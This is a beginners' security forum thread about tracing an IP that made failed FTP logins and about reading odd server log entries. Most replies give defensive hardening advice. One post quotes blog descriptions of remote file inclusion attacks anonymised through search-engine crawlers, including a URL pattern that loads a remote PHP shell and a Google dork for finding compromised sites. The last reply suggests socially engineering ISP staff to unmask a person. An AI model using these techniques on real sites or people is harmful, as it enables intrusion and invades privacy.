IP question

For beginners, flames not allowed...(just by the staff :P)
Post Reply
User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

IP question

Post by Still_Learning »

It is possible to find out the persons name / address or phonenumber if you have their IP?

I had my first hacking attempt on my FTP server :roll:
lol im guessing it was done through a proxy but how can you tell if it is through a proxy or trace the original IP that used the proxy.. and find out the persons name / phone number/ address ect.. I did a whois and this is the only info i found

------------------------------------------

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

ReferralServer: whois://whois.apnic.net

NetRange: 124.0.0.0 - 124.255.255.255
CIDR: 124.0.0.0/8
NetName: APNIC-124
NetHandle: NET-124-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to http://www.apnic.net/info/faq/abuse
RegDate: 2005-01-27
Updated: 2005-05-20

OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3188
OrgTechEmail: search-apnic-not-arin@apnic.net

----------------------------

Im not intrested in reporting or calling them or anything but would like to know how to do it, if it can be done

also i had weird things happening on my web server for example

GET HTTP://SOMEWEIRDSITE.COM/PRX1.PHP?HASH=8HSDF8JHFDBLAH

Does that mean someone is trying to use my http server as a proxy? or trying to hack it or what? i would like to understand the systems logs better, thanks

G-Brain
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 467
Joined: 08 Nov 2007, 17:00
16
Location: NL

Re: IP question

Post by G-Brain »

itzm3 wrote:It is possible to find out the persons name / address or phonenumber if you have their IP?
Only if you work for their ISP, or can do magic tricks.
I <3 MariaLara more than all of you

User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Post by ayu »

Well, the only one who has the address and other personal info about the IP, is the ISP of the IP address. And to know if it's a proxy or not, I guess you could port scan it and see if it can be used as a proxy or not =/

Dunno about the http entry in your log, but it might have been a vulnerability scanner or something like that, trying to get access.
"The best place to hide a tree, is in a forest"

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
18
Location: In your eye floaters.
Contact:

Post by bad_brain »

I guess the attack were multiple login attempts, right? forget it, if you want to kick everyones ass trying such stuff you will need 3 employees for that...if you run phpmyadmin under the default directory (http://mysite/phpmyadmin/) expect loads of such attempts too, same when you run SSH on the default port. I wouldn't even label such stuff as real attacks, it's just the usual "background noise" on the net.
in most cases such login attempts are done by bots on compromised systems, so if you really feel the urge to complain somewhere do it via the abuse@ address of the network host.

strong passwords are the key, don't use real words, use generated ones like 6eZt6$ss....a good practice is also to run SSH on a different port (30000+ or so) and when using phpmyadmin to set a different alias in the apache config.
if you want to do something more active against too many failed login attempts take a look at fail2ban:
http://www.fail2ban.org/wiki/index.php/Main_Page

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

humm.. see the thing is im not useing apache or such, everything is hardcoded almost.

what would you suggest the cause or reason for useing the GET command to pull info or a link from what looks like a proxy server? a malicious bot / program on my PC allready that is trying to access them from my pc?, but now i am seeing it for the first time since i have http server and logging setup?

I do not run phpmyadmin.. have a hardcoded database.

So i guess there no way to find out who the person is (dont plan on travelling to austrialia to kick anyones ass in the first place) :lol: but was just something i wanted to know more about. I dont belelive SSH is setup on my system, i have it running of my linux box not the windows one, since i have more experience with windows. I just ordered Oreillys UNIX powertools book so maybe i will switch the server to freeBSD or *nix in the future, but want to learn how to use it better,

nmap shows this for open ports
PORT STATE SERVICE
20/tcp filtered ftp-data
21/tcp open ftp
80/tcp open http
6667/tcp open irc
8080/tcp open http-proxy

not sure what the http-proxy port and ftp-data port is open for.. any ideas?
could the http-proxy open post be something to do with the GET commands referening prxy links?



password is very secure =)
also change admin name to something other then admin or adminstrator which that seems how they were trying to login, something very random just like the password , since not too many people will think to use 29jd893JH as a admin user name, ect..

I read about fail2ban in a linux magazine but dont beleive it will work with a windows OS being the server

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
18
Location: In your eye floaters.
Contact:

Post by bad_brain »

well, running a Windows server is...um..sub-optimal....^^
you have way better possibilities to secure a Linux server and you also have much more opportunities to learn how things work....so I recommend to switch as soon as possible, best set up a Linux home server first where you can gain some experience.

depending on the mode ftp can use 2 ports: 20 and 21...one for the actual file transfer and the other for the commands like LIST to show the directory...and port 8080 don't necessarily have to be a public http proxy, port 8080 is not an assigned one so it can be used for pretty anything, it is just a usual port for this purpose. I guess you are using an AV/firewall application, they often use port 8080 as local proxy so the loaded websites can be checked while being loaded. to check what program runs behind the port get TCPView from the downloads.... :wink:

User avatar
n3rd
Staff Member
Staff Member
Posts: 1474
Joined: 15 Nov 2005, 17:00
18
Location: my own perfect world in ma head :)
Contact:

Post by n3rd »

bad_brain wrote:I I wouldn't even label such stuff as real attacks, it's just the usual "background noise" on the net.
Then how does background noise get in to the existence of internet?
rather odd that it exists.
[img]http://img580.imageshack.us/img580/8009/userbar2k.png[/img]

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
18
Location: In your eye floaters.
Contact:

Post by bad_brain »

hehe, what I meant is that these are everyday attacks....they are not directly against your computer, such attacks are done by bots scanning whole IP ranges, whenever they find /phpmayadmin or port 22 active for example they start their login attempts using a wordlist.
about 300 attack attempts a day (mostly RFIs) against suck-o are normal, sometimes even 2000 (the record for the last months was more than 11000 caused by a smartass using a poopy vulnerability scanner)....there is nothing you can do about it, but as long as your system is well secured it's also nothing to worry about, like I said: it's the normal internet background noise. at the beginning you might get worried about it, but with more experience you can separate the background noise from the single-minded attacks.... :wink:

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

I would love to set up a linux server, that is my next project probuly, but I need to learn how to use Linux better first. I have been useing windows since DOS was an OS without any GUI, before windows 95, ect.. I used Unix systems previously at that same time period but over the years i always used windows and am more familiar with its inner workings and system config files and such then Linux. I just started useing Linux like a couple months ago =) so a windows server (for me atleast) would probuly be more secure until I learn *nix command line stuff better and how to config all the system files properly , encounter every type of error, ect..

what you sai mostly RFI's what is that? I beleive you are correct B-B it most likely was a bot because it only did about 15 login attempts , used a bunch of default PW's and such like Admin/Password, Administrator / pass, guest/guest, administrator/qwerty/ one weird one.. admin/asshole? huh? lol then seems they gave up or the bot just kept on moveing to an easier target

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
18
Location: In your eye floaters.
Contact:

Post by bad_brain »

I guess the bot simply had a limited amount of user/pass combinations in his wordlist, most likely all default passwords (um, well, except the asshole-one :lol: ).

:wink:
Last edited by bad_brain on 19 Sep 2008, 09:51, edited 1 time in total.

User avatar
DNR
Digital Mercenary
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
18
Location: Michigan USA
Contact:

RFI and search engine hacking

Post by DNR »

RFI= remote file inclusion:
http://en.wikipedia.org/wiki/Remote_File_Inclusion

Btw, this was a nice slant on RFI hacking with search engines:
Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of “Google hacking”, although that is how most of the sites vulnerable to RFI attacks are found).

By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.

PoC -
A malicious web page is constructed by an attacker, containing a URL built like so:
1. Third party site URI to attack.
2. File inclusion exploit.
3. Second URI containing a malicious PHP shell.

Example URL:
http://victim-site/RFI-exploit?http://U ... s-code.php

Google will harvest this URL, visit the site using its crawler and index it.
Meaning accessing the target site with the URL it was provided and exploiting it unwittingly for whoever planted it. It’s a feature, not a bug.

This is currently exploited in the wild. For example, try searching Google for:
inurl:cmd.gif

And note, as an example:
http://www.toomuchcookies.net/index.php ... MD.gif?cmd
Which is no longer vulnerable. The %20 seems out of place, but this is how it is shown in the search.

Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites?

Notes:
1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. File inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. The feature might also be used to anonymize communication, as a covert channel.
http://blogs.securiteam.com/index.php/archives/746
---------

Search Engine Hacking & more
There was a very interesting article posted on the Securiteam blog which talks about anonimizing code injection attacks. The approach is quite simple and yet rather ingenious, simply submit to Google the vulnerable application URL with the attack payload passed via the GET parameters. And within a short period of time Googlebot will dutifuly trying to index the URL, effectively executing the attack. Stefan had also explored this issue on his blog with some examples showing how to ensure more rapid indexing, so you wouldn't have to wait weeks for exploit to be triggered.

However, everybody seemed to have focus on Google, which maybe a bit unfair to them since other search engines suffer the same kind of problems. For example if we take MSN (Microsoft's Search) and run the "inurl:cmd.gif" query that SecuriTeam folks used to test Google, we find a fair number of results. Which tells us that hackers believe in equal opportunity and use MSN as much as Google to propagate their attacks.

But there are other ways too. For example an attack could post an anonymous message on a blog or a forum with an image embedded into where the image url is not an image but rather a URL vulnerable site with embed payload. Which means that when other people read their message their browsers in most cases will make requests to the given URL thus triggering the attack. This is hardly new though, this scam has been used for ages to inflate hit counter stats, etc... Another vector of attack could be to use application that retrieve content from a URL automatically, such as the w3c validator, that will instantly make a request to any given URL and more over return you the resulting HTML at the time obscuring the actual attacker's IP address.

It be interesting to know what other sites allow this kind of behavior where a user supplied URL is instantly retrieved hiding the original user's IP
http://ilia.ws/archives/144-Search-Engi ... -more.html
------

DNR
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

User avatar
cipher24
Newbie
Newbie
Posts: 4
Joined: 08 Oct 2008, 16:00
15

Re: IP question

Post by cipher24 »

itzm3 wrote:It is possible to find out the persons name / address or phonenumber if you have their IP?

I had my first hacking attempt on my FTP server :roll:
lol im guessing it was done through a proxy but how can you tell if it is through a proxy or trace the original IP that used the proxy.. and find out the persons name / phone number/ address ect.. I did a whois and this is the only info i found

------------------------------------------

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

ReferralServer: whois://whois.apnic.net

NetRange: 124.0.0.0 - 124.255.255.255
CIDR: 124.0.0.0/8
NetName: APNIC-124
NetHandle: NET-124-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to http://www.apnic.net/info/faq/abuse
RegDate: 2005-01-27
Updated: 2005-05-20

OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3188
OrgTechEmail: search-apnic-not-arin@apnic.net

----------------------------

Im not intrested in reporting or calling them or anything but would like to know how to do it, if it can be done

also i had weird things happening on my web server for example

GET HTTP://SOMEWEIRDSITE.COM/PRX1.PHP?HASH=8HSDF8JHFDBLAH

Does that mean someone is trying to use my http server as a proxy? or trying to hack it or what? i would like to understand the systems logs better, thanks
That a joke ? lol.

Not possible unless you can hack their ISP

User avatar
Lyecdevf
cyber Idi Amin
cyber Idi Amin
Posts: 1222
Joined: 16 Mar 2006, 17:00
18
Location: In between life and death.
Contact:

Post by Lyecdevf »

I think that the only way you can do that if you some how socially engineer the ISP. Maybe if you catch some stupid employee on a Sunday morning and have some really good story...who knows!..eh 8)
We will either find a way, or make one.
- Hannibal

Post Reply